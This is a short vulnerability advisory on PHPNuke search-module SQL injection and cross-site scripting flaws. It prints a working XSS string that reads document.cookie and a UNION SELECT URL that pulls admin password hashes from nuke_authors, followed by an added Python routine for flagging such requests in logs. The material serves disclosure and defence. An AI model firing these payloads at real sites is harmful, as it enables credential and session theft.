Multiple PHPNuke SQL Injection And Cross-Site Scripting Vulnerabilities

No exploit is required.

An example of a search request sufficient to trigger the cross-site scripting vulnerability:
1"><body onload="alert(document.cookie);

An example of the SQL injection vulnerability:
http://www.example.com/nuke73/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
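
For log review, the two request shapes above can be flagged with a short detection routine. This is an added example, not part of the original advisory or of PHPNuke. The function names, the use of the `query` parameter for the script-injection sample, and the benign URL are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, quote

# In the advisory's SQL injection URL, /**/ comments stand in for whitespace,
# so comments are collapsed to spaces before keyword matching.
_SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
# Attribute breakout (quote followed by '>') or an inline event handler.
_ATTR_BREAKOUT = re.compile(r"[\"']\s*>")
_EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)


def normalise_sql(value: str) -> str:
    """Replace SQL block comments with spaces and squeeze whitespace."""
    return re.sub(r"\s+", " ", _SQL_COMMENT.sub(" ", value)).strip()


def classify_request(url: str) -> dict:
    """Return {parameter name: [findings]} for one request URL."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = []
        if _UNION_SELECT.search(normalise_sql(value)):
            hits.append("sqli-union-select")
        if _ATTR_BREAKOUT.search(value) or _EVENT_HANDLER.search(value):
            hits.append("xss-markup")
        if hits:
            findings[name] = hits
    return findings


BASE = "http://www.example.com/nuke73/modules.php?name=Search"
# The SQL injection URL as given in the advisory.
SQLI_URL = (BASE + "&type=comments&query=not123exists&instory="
            "/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors")
# Constructed: the advisory's search string, URL-encoded into 'query' (assumed).
XSS_URL = BASE + "&query=" + quote('1"><body onload="alert(document.cookie);')
# Constructed benign search that contains the word "union".
BENIGN_URL = BASE + "&type=comments&query=union+station&instory="

if __name__ == "__main__":
    for url in (SQLI_URL, XSS_URL, BENIGN_URL):
        print(classify_request(url) or "clean", "<-", url)
```

Matching on the comment-normalised value is what catches the `/**/` form, which a plain `UNION SELECT` string match on the raw URL would miss.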


 

Copyright 2010, SecurityFocus